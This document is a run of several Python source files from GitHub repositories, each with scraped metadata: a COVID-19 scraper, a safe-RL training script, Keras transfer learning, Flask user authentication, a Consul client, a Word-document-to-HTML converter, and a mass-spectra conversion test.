cases = []
for i, case in enumerate(all_cases):
cases.append(case.text.strip())
cases = np.array(cases).reshape((len(city_list), len(labels[3:])))
# print(cases.shape)
# print(cases[0])
data = {}
for i, city in enumerate(city_list):
city_url = city["href"]
city = city.text.strip()
data[city] = {
# "city": city,
"city url": city_url,
"cases": {
"spesimen": dict(zip(labels[3:7], cases[i][:4])),
"suspek": dict(zip(labels[7:11], cases[i][4:8])),
"terkonfirmasi": dict(zip(labels[11:], cases[i][8:])),
}
}
# print(labels[3:])
# print(cases[i])
# break
# print(data[0])
with open("{}.json".format(FILENAME), "w", encoding="utf-8") as f:
json.dump(data, f, ensure_ascii=False, indent=4)
index = pd.Index([city.text.strip() for city in city_list])
columns = pd.MultiIndex.from_arrays(
(['spesimen']*4 + ['suspek']*4 + ['terkonfirmasi']*4, labels[3:])
)
df = pd.DataFrame(cases, index=index, columns=columns)
print(df.head(20))
df.to_csv("{}.csv".format(FILENAME), index=True)
print("Finish in %s.3f seconds." % (time.time()-start_time))
| mfalfafa/scrape-covid19-data-riau | scraper.py | scraper.py | py | 1,975 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_numb... |
846869458 | import argparse
import json
import os
from datetime import datetime
from statistics import mean
import chainer
import chainerrl
import numpy as np
from chainerrl.wrappers import CastObservationToFloat32, ScaleReward
from estimator import RecoNet, ThreatEstimator
from q_func import RPDQN, QFunction, RPQFunction
from util import Environment, default_circuit
if __name__ == '__main__':
parser = argparse.ArgumentParser(
prog='run.py',
description='run learning',
add_help=True
)
parser.add_argument('--gpu', dest='gpu', action='store_true')
parser.add_argument('--seed', dest='seed', default=0, type=int)
parser.add_argument('--load', dest='load', default='', type=str)
parser.add_argument('--normal', dest='normal', action='store_true')
parser.add_argument('--adameps', dest='adam_eps', default=1e-2, type=float)
parser.add_argument('--adamalpha', dest='adam_alpha',
default=1e-3, type=float)
parser.add_argument('--gamma', dest='gamma', default=0.90, type=float)
parser.add_argument('--alllog', dest='all_log', action='store_true')
parser.add_argument('--lmd', dest='lmd', default=200, type=int)
parser.add_argument('--scale', dest='scale', default=1.0, type=float)
parser.add_argument('--firsteps', dest='firsteps', default=1.0, type=float)
parser.add_argument('--step', dest='step', default=3 * 10 ** 6, type=int)
parser.add_argument('--demo', dest='demo', action='store_true')
parser.add_argument('--render', dest='ren', action='store_true')
parser.add_argument('--eval', dest='eval', type=str, default='')
parser.add_argument('-t', dest='times', default=100, type=int)
args = parser.parse_args()
gpus = (0,) if args.gpu else ()
chainerrl.misc.set_random_seed(args.seed, gpus)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
result_dir = os.path.join('results/circuit', timestamp)
os.makedirs(result_dir)
with open(os.path.join(result_dir, 'args.json'), 'w') as f:
json.dump(args.__dict__, f, indent=2)
circuit = default_circuit()
rand = False if args.demo else True
env = Environment(circuit=circuit,
random_init=rand, result_dir=result_dir, file='crash_train.log', all_log=args.all_log,
lmd=args.lmd, render=args.ren)
n_actions = len(env.agent.action_list)
env = ScaleReward(env, args.scale)
reconet = RecoNet()
estimator = ThreatEstimator(
reconet, 'circuit/threat.model', args.gpu)
danger_limit = 1e-3
step = args.step
if args.normal:
q_func = QFunction(n_actions)
else:
q_func = RPQFunction(n_actions, estimator,
danger_limit)
optimizer = chainer.optimizers.Adam(
eps=args.adam_eps, alpha=args.adam_alpha)
optimizer.setup(q_func)
explorer = chainerrl.explorers.LinearDecayEpsilonGreedy(
args.firsteps, 0.05, step, random_action_func=lambda: np.random.randint(n_actions))
replay_buffer = chainerrl.replay_buffer.PrioritizedReplayBuffer(1e6)
if args.normal:
agent = chainerrl.agents.DoubleDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
else:
agent = RPDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
env.unwrapped.result_agent = agent
if args.demo:
if args.load:
agent.load(args.load)
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
env.unwrapped.render()
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
print('Reward:', total)
elif args.eval:
def gen_dir_name(jobid):
times = step // 10**5
yield ''
dirname = args.eval + '/'
for i in range(times - 1):
yield dirname + 'agent' + str(i + 1)
yield dirname + str(int(step)) + '_finish'
crash_ratio = []
reward_list = []
steps = np.arange(0, step + 1, 10**5)
for agent_dir_name in gen_dir_name(args.eval):
if agent_dir_name:
agent.load(agent_dir_name)
print('agent:', agent_dir_name)
env = Environment(circuit=circuit,
random_init=True, result_dir=result_dir,
file='crash_train.log', all_log=args.all_log,
lmd=args.lmd)
total_episode_reward = []
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
if not env.crashed:
total_episode_reward.append(total)
ave_reward = mean(total_episode_reward) if len(
total_episode_reward) > 0 else np.nan
ratio = env.crash_cnt / args.times
print('result: crash_cnt ', ratio,
' pure_reward ', ave_reward, end='\n\n')
crash_ratio.append(ratio)
reward_list.append(ave_reward)
crash_ratio = np.array(crash_ratio)
reward_list = np.array(reward_list)
data = np.vstack((steps, crash_ratio))
data2 = np.vstack((steps, reward_list))
print(data)
np.save(os.path.join(result_dir, 'crash.npy'), data)
print(data2)
np.save(os.path.join(result_dir, 'reward.npy'), data2)
else:
if args.load:
agent.load(args.load)
chainerrl.experiments.train_agent_with_evaluation(
agent, env, steps=step, eval_n_steps=None, eval_n_episodes=1,
train_max_episode_len=200, eval_interval=1e4, outdir=result_dir,
eval_env=Environment(circuit=circuit, result_dir=result_dir, file='crash_test.log',
all_log=True, lmd=200))
| pfnet-research/rp-safe-rl | circuit/run.py | run.py | py | 6,662 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "chainerrl.misc.set_random_seed",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "chainerrl.misc",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_na... |
44396105133 | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import tensorflow_datasets as tfds
import os
if __name__ == '__main__':
tfds.disable_progress_bar()
train_ds, validation_ds, test_ds = tfds.load(
"cats_vs_dogs",
data_dir=os.path.expanduser("~/junk/"),
# Reserve 10% for validation and 10% for test
split=[
tfds.Split.TRAIN.subsplit(tfds.percent[:40]),
tfds.Split.TRAIN.subsplit(tfds.percent[40:50]),
tfds.Split.TRAIN.subsplit(tfds.percent[50:60])
],
as_supervised=True, # Include labels
)
print("Number of training samples: %d" % tf.data.experimental.cardinality(train_ds))
print("Number of validation samples: %d" % tf.data.experimental.cardinality(validation_ds))
print("Number of test samples: %d" % tf.data.experimental.cardinality(test_ds))
size = (150, 150)
train_ds = train_ds.map(lambda x, y: (tf.image.resize(x, size), y))
validation_ds = validation_ds.map(lambda x, y: (tf.image.resize(x, size), y))
test_ds = test_ds.map(lambda x, y: (tf.image.resize(x, size), y))
batch_size = 32
train_ds = train_ds.cache().batch(batch_size).prefetch(buffer_size=10)
validation_ds = validation_ds.cache().batch(batch_size).prefetch(buffer_size=10)
test_ds = test_ds.cache().batch(batch_size).prefetch(buffer_size=10)
data_augmentation = keras.Sequential(
[
layers.experimental.preprocessing.RandomFlip("horizontal"),
layers.experimental.preprocessing.RandomRotation(0.1),
]
)
base_model = keras.applications.Xception(
weights="imagenet", # Load weights pre-trained on ImageNet.
input_shape=(150, 150, 3),
include_top=False, # Do not include the ImageNet classifier at the top.
)
base_model.trainable = False # Freeze the base_model
# Create new model on top
inputs = keras.Input(shape=(150, 150, 3))
x = data_augmentation(inputs)
# Pre-trained Xception weights requires that input be normalized from (0, 255) to a range (-1., +1.),
# the normalization layer does the following, outputs = (inputs - mean) / sqrt(var)
norm_layer = keras.layers.experimental.preprocessing.Normalization()
mean = np.array([127.5] * 3)
var = mean ** 2
x = norm_layer(x) # Scale inputs to [-1, +1]
norm_layer.set_weights([mean, var])
# The base model contains batchnorm layers.
# We want to keep them in inference mode when we unfreeze the base model for fine-tuning,
# so we make sure that the base_model is running in inference mode here.
x = base_model(x, training=False)
x = keras.layers.GlobalAveragePooling2D()(x)
x = keras.layers.Dropout(0.2)(x) # Regularize with dropout
outputs = keras.layers.Dense(1)(x)
model = keras.Model(inputs, outputs)
model.summary()
model.compile(
optimizer=keras.optimizers.Adam(),
loss=keras.losses.BinaryCrossentropy(from_logits=True),
metrics=[keras.metrics.BinaryAccuracy()],
)
"""train the top layer"""
epochs = 20
model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
"""do a round of fine-tuning of the entire model"""
base_model.trainable = True
model.summary()
model.compile(
optimizer=keras.optimizers.Adam(1e-5), # Low learning rate for fine tuning
loss=keras.losses.BinaryCrossentropy(from_logits=True),
metrics=[keras.metrics.BinaryAccuracy()],
)
epochs = 10
model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
| jk983294/morph | book/tensorflow/models/transfer.py | transfer.py | py | 3,632 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow_datasets.disable_progress_bar",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "tensorflow_datasets.load",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 12,
"usage_type": "call"
},
{
... |
30838346418 | from flask import Blueprint, current_app, request, make_response, jsonify
from ..models.User import User
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
jwt_required,
)
import traceback
auth_bp = Blueprint('auth_bp', __name__)
# registrater user
@auth_bp.route('/user/registration', methods=['POST'])
def deo_registration():
try:
if request.is_json:
data = request.get_json(force=True)
else:
data = request.form
columns = ["username","first_name","surname","HIV_status","Phone_number"]
for column in columns:
if column not in data:
return make_response(jsonify({'message': f'{column} is missing from payload!'}), 400)
existing_user = User.query.filter(User.username == data['username']).first()
if existing_user:
return make_response(jsonify({'message': 'Username already exists!'}), 400)
if len(data['Phone_number']) > 15 or len(data['Phone_number']) < 10:
return make_response(jsonify({'message': 'Phone number should be between 10-15 digits!'}), 400)
# create new User
new_user = User(
username = data['username'],
first_name = data['first_name'],
password = User.hash_password(data['password']),
surname = data['surname'],
age = data['age'],
HIV_status = data['HIV_status'],
Phone_number = data['Phone_number']
)
new_user.save()
# access_token = create_access_token(identity = data['username'])
# refresh_token = create_refresh_token(identity = data['username'])
resp = jsonify({'message':'Account created successfully'})
return make_response(resp, 201)
except:
return make_response(str(traceback.format_exc()),500)
# user login
@auth_bp.route('/user/login', methods=['POST'])
def login():
try:
data = request.get_json(force=True)
username = data['username']
user = User.query.filter(User.username==username).first()###
password = data['password']
access_token = create_access_token(identity = data['username'])
refresh_token = create_refresh_token(identity = data['username'])
if not user:
return make_response(jsonify({"message":"Account doesn't exist"}),400)
if not user.is_password_valid(password):
return make_response(jsonify({"message":"Invalid credentials"}),400)
resp = jsonify({'access_token':access_token,
'refresh_token':refresh_token,
'message':'Login Successful'
})
return make_response(resp,200)
except:
return make_response(str(traceback.format_exc()),500)
# get all system users
@auth_bp.route('/user/get_users', methods=['GET'])
@jwt_required()
def get_all_users():
try:
num_of_items = current_app.config['NUM_OF_ITEMS_PER_PAGE']
page = request.args.get('page', 1, type=int)
pagination_info = {}
user_data = User.query.order_by(User.user_id.desc()).paginate(page, num_of_items, False)
pagination_info['next_page'] = user_data.next_num
pagination_info['prev_page'] = user_data.prev_num
pagination_info['current_page'] = user_data.page
pagination_info['no_of_pages'] = user_data.pages
pagination_info['items_per_page'] = user_data.per_page
pagination_info['total_items'] = user_data.total
users = [z.serialise() for z in user_data.items]
return make_response(jsonify({"data": users, "info": pagination_info}),200)
except:
return make_response(str(traceback.format_exc()),500)
# get user by id
@auth_bp.route('/user/get_user/<int:user_id>', methods=['GET'])
@jwt_required()
def get_user(user_id):
try:
user = User.query.get(user_id)
return make_response(jsonify(user.serialise()),200)
except:
return make_response(str(traceback.format_exc()),500)
| conradsuuna/uac-computer-competency | app/controllers/users.py | users.py | py | 4,056 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Blueprint",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "flask.request.is_json",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.reques... |
4289870302 | # consul_client.py
import consul
import socket
import time
import threading
import json
import re
import random
from flask import Flask
from typing import Dict, List, Union
from dzmicro.utils import compare_dicts
class WatchKVThread(threading.Thread):
def __init__(self, uuid: str, is_platform: bool) -> None:
super().__init__(name=f'WatchKV')
self.uuid = uuid
self.is_platform = is_platform
self._stop = False
self._kv = {}
def set_server_unique_info(self) -> None:
from dzmicro.utils import singleton_server_manager
self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
self._prefix = self.server_unique_info.consul_info.get_prefix()
def stop(self) -> None:
self._stop = True
def on_config_changed(self, config_dict: Dict[str, any], change: str) -> None:
bot_commands = self.server_unique_info.bot_commands
if change == 'add':
pattern = fr"{self._prefix}(\w+)/config"
for key, value in config_dict.items():
match = re.search(pattern, key)
if match:
service_name = f'DBot_{match.group(1)}'
keyword = value.get('keyword')
bot_commands.add_keyword(keyword, service_name)
commands = value.get('commands')
if service_name and commands:
for command in commands:
bot_commands.add_commands(keyword, command)
def on_listener_changed(self, listener_dict: Dict[str, any], change: str) -> None:
from dzmicro.utils import singleton_server_manager
server_shared_info = singleton_server_manager.get_server_shared_info()
listener_manager = server_shared_info.listener_manager
pattern = fr"{self._prefix}(\w+)/listeners"
for key, value in listener_dict.items():
match = re.search(pattern, key)
if match:
if change == 'add':
service_name = f'DBot_{match.group(1)}'
#TODO 需不需要比较service_name和value中的service_name是否一致?
listener_manager.update_listeners(value)
elif change == 'modify':
#TODO 完善listener_manager.update_listeners的功能,让他可以自动适应添加与修改
listener_manager.update_listeners(value.get('old'), is_rm=True)
listener_manager.update_listeners(value.get('new'))
elif change == 'delete':
listener_manager.update_listeners(value, is_rm=True)
def on_add_kv(self, added_dict: Dict[str, any]) -> None:
print(f'添加\n{added_dict}\n')
self.on_config_changed(added_dict, 'add')
self.on_listener_changed(added_dict, 'add')
def on_deleted_kv(self, deleted_dict: Dict[str, any]) -> None:
#TODO 配置文件删除
print(f'删除\n{deleted_dict}\n')
self.on_config_changed(deleted_dict, 'delete')
self.on_listener_changed(deleted_dict, 'delete')
def on_modified_kv(self, modified_dict: Dict[str, any]) -> None:
#TODO 配置文件修改
print(f'修改\n{modified_dict}\n')
self.on_config_changed(modified_dict, 'modify')
self.on_listener_changed(modified_dict, 'modify')
def run(self) -> None:
consul_client = self.server_unique_info.consul_client
while not self._stop:
new_kv = {}
while True:
try:
# 获取指定文件夹下的所有key
#TODO 这个前缀也可以在kv中配置
keys = consul_client.download_key_value(self._prefix, [], True)
break
except:
print('下载字典失败,正在重试')
time.sleep(1)
# 读取所有key的值,并将结果存储在字典中
for key in keys:
while True:
try:
json_data = consul_client.download_key_value(key, '')
new_kv[key] = json_data
break
except:
print('下载字典失败,正在重试')
time.sleep(1)
added, deleted, modified = compare_dicts(self._kv, new_kv)
if added:
self.on_add_kv(added)
if deleted:
self.on_deleted_kv(deleted)
if modified:
self.on_modified_kv(modified)
self._kv = new_kv
time.sleep(1)
class ConsulClient:
def __init__(self, uuid: str, is_platform: bool = False, host: str = 'localhost', port: int = 8500) -> None:
#TODO assert consul_info需要先加载
self.uuid = uuid
self.is_platform = is_platform
self.consul = consul.Consul(host=host, port=port)
def set_server_unique_info(self) -> None:
from dzmicro.utils import singleton_server_manager
self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
self.prefix = self.server_unique_info.consul_info.get_prefix()
self.consul.token = self.server_unique_info.consul_info.get_token()
# def set_prefix(self, prefix: str = '') -> None:
# self._prefix = prefix
# def set_token(self, token: str) -> None:
# if token:
# self.consul.token = token
def register_service(self, service_name: str, service_port: Union[str, int], service_tags: List[str] = []) -> str:
"""
注册服务到Consul
"""
service_id = f'{service_name}-{socket.gethostname()}'
service_address = socket.gethostbyname(socket.gethostname())
service_check = consul.Check.http(url=f'http://{service_address}:{service_port}/health', interval='10s')
self.consul.agent.service.register(name=service_name, service_id=service_id, address=service_address, port=service_port, tags=service_tags, check=service_check)
return service_id
def update_key_value(self, dict_to_upload: Dict[str, any]) -> None:
"""
将字典上传Consul
"""
for key, value in dict_to_upload.items():
while True:
try:
value_json = json.dumps(value)
self.consul.kv.put(key, value_json.encode('utf-8'))
break
except consul.base.ConsulException:
print(f'上传字典{dict}失败,正在重试')
time.sleep(1)
def download_key_value(self, key: str, default: any = None, keys: bool = False) -> any:
"""
从Consul下载指定的Key Value
"""
index, data = self.consul.kv.get(key, keys=keys)
if data:
if keys:
return data
else:
value_json = data['Value'].decode('utf-8')
value = json.loads(value_json)
return value
else:
return default
def deregister_service(self, service_id: str) -> None:
"""
从Consul中注销服务
"""
self.consul.agent.service.deregister(service_id)
def discover_services(self, service_name: str) -> List[List[str]]:
"""
发现服务,返回所有设备信息
"""
#TODO 考虑添加查询表缓存,需要考虑查询表的刷新;刷新时机可以选择为WatchKVThread发现变动时
# 过滤掉不健康的服务
try:
services = self.consul.health.service(service_name, passing=True)[1]
return [[service.get('Service', {}).get('Address', ''), service.get('Service', {}).get('Port', '')] for service in services]
except:
return [[]]
def discover_service(self, service_name: str) -> Union[List[List[str]], None]:
"""
发现服务,随机返回其中一个设备信息
"""
services = self.discover_services(service_name)
if not services:
return None
return random.choice(services)
def check_port_available(self, sname: str, sip: str, sport: Union[int, str]) -> bool:
if sip == '0.0.0.0' or sip == '127.0.0.1':
sip = socket.gethostbyname(socket.gethostname())
# 获取所有已注册的服务
services = self.consul.agent.services()
# 遍历所有已注册的服务,获取它们的 IP 和端口号
service_instances = {}
for service_id in services:
service_name = services[service_id]['Service']
_, instances = self.consul.health.service(service_name, passing=True)
for instance in instances:
ip = instance['Service']['Address']
port = instance['Service']['Port']
if service_name not in service_instances:
service_instances[service_name] = []
service_instances[service_name].append((ip, port))
# 逐个检查服务列表和对应的实例 IP 和端口号
for name, instances in service_instances.items():
for ip, port in instances:
if sip == ip and sport == port and sname != name:
print(f'{ip}:{port}已被{name}占用')
return False
return True
def register_consul(self, app: Flask, name: str, port: Union[str, int], tags: List[str]) -> None:
'''
服务开启前,注册consul
'''
id = self.register_service(name, port, tags)
app.config.update({'id': id})
def deregister_service(self, app: Flask) -> None:
'''
服务结束后,注销consul
'''
id = app.config['id']
self.deregister_service(self, id)
| dzming-git/DzMicro | dzmicro/utils/network/consul_client.py | consul_client.py | py | 9,967 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "threading.Thread",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "dzmicro.utils.singleton_server_manager.get_server_unique_info",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "dzmicro.utils.singleton_server_manager",
"line_number": 2... |
20324309262 | # -*- coding: utf-8 -*-
from django import forms
from bson.objectid import ObjectId
#from lib import get_db
class rich_form(forms.Form):
def as_read(self):
rt=''
for k,v in self.cleaned_data.iteritems():
rt+='<tr><td>'
rt+=str(self.field[k].label)
rt+='</td><td>'
if type(v)==list:
for ite in v:
rt+=str(ite)
else:
rt+=str(v)
rt+='</td></tr>'
def set_choices(self,fieldname,newlist):
self.fields[fieldname].choices=newlist
# class email_login(forms.Form):
# email=forms.EmailField(
# label=u'公司邮箱',
# strip=True,
# required=True,
# )
# password=forms.CharField(
# widget=forms.widgets.PasswordInput,
# label=u'密码',
# required=True,
# )
# department=forms.TypedChoiceField(
# label=u'部门',
# choices=[
# ['finance',u'财务部'],
# ['it',u'资讯科技部'],
# ],
# )
# taskname=forms.CharField(
# widget=forms.widgets.HiddenInput,
# )
# fileup=forms.FileField(
# label=u'文件',
# ) | raynardj/terminus | major/share/upgrade/forms.py | forms.py | py | 1,011 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.Form",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 6,
"usage_type": "name"
}
] |
40097713775 | import flask
import os
import zipfile
from docx.api import Document
from flask import request, jsonify
from flask_s3 import *
from io import BytesIO
from werkzeug.utils import secure_filename
import boto3
from s3_credential import *
import pypandoc
from bs4 import BeautifulSoup
from datetime import datetime
import json
import uuid
import time
s3 = FlaskS3()
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['UPLOAD_FOLDER'] = os.path.join('word','media')
app.config['FLASKS3_BUCKET_NAME'] = os.environ.get("AWS_BUCKET_NAME")
app.config['AWS_ACCESS_KEY_ID'] = os.environ.get("AWS_ACCESS_KEY_ID")
app.config['AWS_SECRET_ACCESS_KEY'] = os.environ.get("AWS_SECRET_ACCESS_KEY")
app.config['FLASKS3_BUCKET_DOMAIN'] = 's3.ap-south-1.amazonaws.com'
s3.init_app(app)
s3_boto = boto3.client('s3')
s3_res = boto3.resource("s3")
buck = s3_res.Bucket(os.environ.get("AWS_BUCKET_NAME"))
def generate_unique_name(length=10):
timestamp_got = datetime.now().strftime("%s")
unique_name = f"img{timestamp_got}.png"
return unique_name
def get_url(key):
url = s3_boto.generate_presigned_url(
ClientMethod='get_object',
Params={
'Bucket': os.environ.get("AWS_BUCKET_NAME"),
'Key': key
},
ExpiresIn=9600)
return url
@app.route("/upload-document",methods=["POST"])
def uploadDocument():
document = request.files.get("file",False)
if(document):
memfile = BytesIO()
document.save(memfile)
document = Document(memfile)
tables = document.tables
z = zipfile.ZipFile(memfile)
z.extractall()
all_files = z.namelist()
# print(all_files)
images = filter(lambda x: x.startswith('/word/media/'), all_files)
# return "yo"
rels = {}
real_name = {}
for r in document.part.rels.values():
if isinstance(r._target, docx.parts.image.ImagePart):
file_location = '/word/media/'+secure_filename(generate_unique_name())
fbinary = open(f'word/media/{os.path.basename(r._target.partname)}',"rb")
file_url_upload = os.path.join("/media/docimages",os.path.basename(file_location))
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
rels[r.rId] = get_url(file_url_upload)
# print(s.generate_presigned_url(expires_in=0))
real_name[r.rId] = os.path.basename(r._target.partname)
# Data will be a list of rows represented as dictionaries
# containing each row's data.
data = []
keys = None
topic_id = ''
get_string = ""
#print(dir(table.columns))
for table in tables :
tr = {}
for i, row in enumerate(table.rows):
tr[row.cells[0].text] = ''
for paragraph in row.cells[1].paragraphs:
if(row.cells[0].text == 'Topic ID'):
topic_id = row.cells[1].text
for rId in rels:
if rId in paragraph._p.xml:
z.extract('word/media/'+real_name[rId],os.getcwd())
tr[row.cells[0].text]+=f'<img src="{rels[rId]}">'
if(row.cells[0].text == 'Problem Statement' or row.cells[0].text == 'Correct Answer Explanation') :
# print(paragraph.font.superscripipt)
print(paragraph._element.xml)
get_string+=paragraph._element.xml+"\n"
tr[row.cells[0].text]+='<p>'+paragraph.text+'</p>'
# print(paragraph.style.font.superscript)
else :
tr[row.cells[0].text]+=paragraph.text
data.append(tr)
allData = {}
allData['document'] = {}
allData['document']['Topic ID'] = topic_id
allData['document']['questions'] = data
with open("output.xml",'w') as file:
file.write(get_string)
return jsonify(allData)
def arrangeData(data,variable,image_hash_data):
if(data[1].findChild()):
if(len(data[1].findAll("img"))):
img_data = data[1].findAll("img")
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
img_data[i]["src"] = object_url
variable[data[0].text] = str(data[1]).replace("<td>", "").replace("</td>", "")
else:
variable[data[0].text] = data[1].text
# print(type(data[1]))
# print(data[1])
else:
variable[data[0].text] = data[1].text
return variable
def preprocessData(data,image_hash_data):
tr_data = data.findAll("tr")
result_recv = {}
for i,tr in enumerate(tr_data):
result = tr_data[i]["class"]
if(result[0]!="header"):
all_data = tr_data[i].findAll("td")
# print(all_data[0],all_data[1])
if(len(all_data)):
arrangeData(all_data, result_recv,image_hash_data)
else:
all_data = tr.findAll("th")
arrangeData(all_data, result_recv,image_hash_data)
return result_recv
@app.route("/api/json",methods=["POST"])
def preprocessDocFunc():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
#unique_name = secure_filename(generate_unique_name())
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
html = pypandoc.convert_file(real_file_path, 'html',extra_args=['--webtex'])
parser = BeautifulSoup(html,"html.parser").findAll("table")
topic_id = (parser[0].find(text="Topic ID").findNext("th") if parser[0].find(text="Topic ID").findNext("th") else parser[0].find(text="Topic ID").findNext("td")).text
all_data = [preprocessData(tdata,image_hash_data) for tdata in parser if preprocessData(tdata,image_hash_data)]
except Exception as e:
errros_arr.append(str(e))
return {
"document":{
"Topic ID":topic_id,
"questions":all_data
},
"errors":errros_arr
}
@app.route("/api/html",methods=["POST"])
def htmlresponse():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
#print(unique_name)
#exit()
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
time.sleep(1)
html = pypandoc.convert(real_file_path,'html',extra_args=['--mathjax'])
parser = BeautifulSoup(html,"html.parser").findAll("img")
img_data = parser
resp = str(html)
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
old_img = img_data[i]['src']
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
resp = resp.replace(old_img,object_url )
except Exception as e:
errros_arr.append(str(e))
return resp
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
app.run() | ActiKnow/docx-to-html-json | index.py | index.py | py | 9,727 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_numb... |
1154715752 | import os
from flask import Flask
from src.models import migrate, db
from src.command import data_load_command
from src.api import api
config_variable_name = 'FLASK_CONFIG_PATH'
default_config_path = os.path.join(os.path.dirname(__file__), 'config/local.py')
os.environ.setdefault(config_variable_name, default_config_path)
def create_app(config_file=None, settings_override=None):
app = Flask(__name__)
if config_file:
app.config.from_pyfile(config_file)
else:
app.config.from_envvar(config_variable_name)
if settings_override:
app.config.update(settings_override)
@app.cli.command("load_docs")
def load_docs():
data_load_command()
init_app(app)
api.init_app(app)
return app
def init_app(app):
db.init_app(app)
migrate.init_app(app, db)
#api.init_app(app)
| shano/document_keyword_analysis | app.py | app.py | py | 849 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.environ.setdefault",
... |
2063174381 | # -*- coding: utf-8 -*-
"""
@title: test_convert_spectra.py
@description: Example Python script to test the spectra data converter and to test reloading the converted spectra data
@author: chrisarcadia
@created: 2018/10/26
"""
import Bruker
import matplotlib.pyplot as pyplot
import h5py
import numpy
# Convert a data file
try:
input_filename = r'C:\Users\ChrisTow\Desktop\Examples\single\Mix_1_100_1.d';
output_filename = r'C:\Users\ChrisTow\Desktop\Converted\single\Mix_1_100_1.hdf5';
settings = Bruker.get_measurement_settings(input_filename);
positions = settings['positions'];
Bruker.convert_settings(output_filename, settings);
Bruker.convert_data_spectra(input_filename,output_filename,settings);
converted = 1;
except:
converted = 0; # do nothing if file already exists
# Load the converted data
hf = h5py.File(output_filename, 'r');
spec = hf.get('spectra/');
index = 0;
mz = numpy.array(spec['mass_to_charge'][index,:]);
signal = numpy.array(spec['signal'][index,:]);
info = {}
for k in spec.attrs.keys():
info.update({k:spec.attrs[k]});
hf.close();
print('Data Info:')
print(info);
# Plot one of the spectra
pyplot.plot(mz,signal, 'bo', markersize=1)
pyplot.ylabel('Signal')
